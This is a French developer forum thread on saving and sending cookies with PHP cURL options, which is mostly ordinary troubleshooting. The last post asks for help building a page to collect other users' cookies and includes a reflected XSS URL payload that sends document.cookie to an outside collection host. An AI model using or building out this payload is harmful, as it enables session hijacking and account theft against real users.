|
Publicité ' | |||||||||||||||||||||||
|
|
#1 |
|
Candidat au titre de Membre du Club
![]() Inscription : septembre 2005 Messages : 38 ![]() |
Bonjour,
J'essai avec CURL d'envoyer une requète à un serveur et de récupérer le résultat (ça, c'est bon). Seulement, le serveur envoi parfois des cookies. Dans ce cas, je veux les transférer au client, et vice-versa. Mais comment faire ? Je ne comprends pas bien le comportement de CURLOPT_COOKIEFILE ou autres... Merci d'avance de votre aide. |
|
|
00
|
|
|
#2 |
|
Inscrit
Voici l'option à configurer pour stocker le(s) cookie(s) à la fin de la session :
curl_setopt($ch, CURLOPT_COOKIEJAR, "/chemin/vers/cookie.txt"); Pour envoer un cookie lors d'une requête avec libcurl : curl_setopt($ch, CURLOPT_COOKIEFILE, "/chemin/vers/cookie.txt");
Q: Dois-je haïr et cogner sur Microsoft ? R: Non, vous n'êtes pas obligé. Non pas que Microsoft n'est pas écoeurant, mais il y avait une culture hacker bien avant Microsoft et il y en aura une bien après que Microsoft aura été de l'histoire ancienne. Toute énergie dépensée à haïr Microsoft serait mieux employée par vos compétences et votre passion. Écrivez du bon code, cela brisera suffisamment Microsoft sans polluer votre karma. Comment devenir un hacker ? par Eric Steven Raymond |
|
|
00
|
|
|
#3 |
|
Bonjour,
Lorsque j'utilise CURLOPT_COOKIEJAR, aucun fichier n'est créé. Par exemple : curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt"); Lorsque je vais voir dans mon répertoire, aucun fichier portant le nom cookie.txt n'y est. De plus, j'ai des opérations à faire sur les cookies récupérés. Comment donc accéder au fichier "cookie.txt" censé être créé ? Merci encore. |
|
|
00
|
|
|
#4 | ||
|
En attente de confirmation mail
![]() Inscription : juin 2002 Messages : 6 164 ![]() |
Citation:
Citation:
|
||
|
|
00
|
|
|
#5 |
|
Merci, j'ai enfin réussi à créer le fichier. C'est effectivement un fichier texte formaté, je n'ai donc eu aucun mal à faire ce que j'en voulais.
Merci encore. |
|
|
00
|
|
|
#6 |
|
Invité de passage
![]() Inscription : septembre 2008 Messages : 1 ![]() |
j'ai besoin d'aide car je doit ecrire une page PHP qui me permettra de recevoir les cookies d'un autre utilisateur en injectant un script dans un URL comme suivant
http://www.monsite.com/index.php?name=<script>window.open("http://www.voldecookie.com/collect.php?cookie="%2Bdocument.cookie)</script> MERCII |
|
|
00
|
Copyright © 2000-2012 - www.developpez.com